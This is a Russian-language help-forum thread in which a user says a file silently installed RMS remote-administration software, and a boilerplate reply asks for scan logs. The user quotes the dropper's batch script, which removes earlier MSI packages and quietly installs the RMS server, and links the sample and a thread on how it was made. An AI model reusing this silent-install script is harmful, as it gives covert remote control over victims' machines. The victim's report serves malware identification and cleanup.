-
Junior Member
- Вес репутации
- 51
Хитрый мошенник
Здравствуйте,помогите пожалуйста.
Запустил один файл,а когда понял что зря,было поздно и что странно,антивирус пропустил его.
RMS-Удаленое управления.
Вообщем вот этот файл: http://rghost.ru/55468837
Это rar архив,в котором запакованы два файла .bat и .msi
В bat фале указаны строчки,цитирую:
@chcp 1251
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /passive REBOOT=ReallySuppress
@MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /passive REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "rms5.2.1_server.msi" /qn
Вот тема на изготовления этого вируса: http://www.xaker.name/forvb/showthread.php?t=23230
UPD: Тему можно удалять,не стал ждать пока украдут все мои пороли и снес систему.
Последний раз редактировалось altair-r; 21.05.2014 в 11:42.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) altair-r, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
Ответить с цитированием
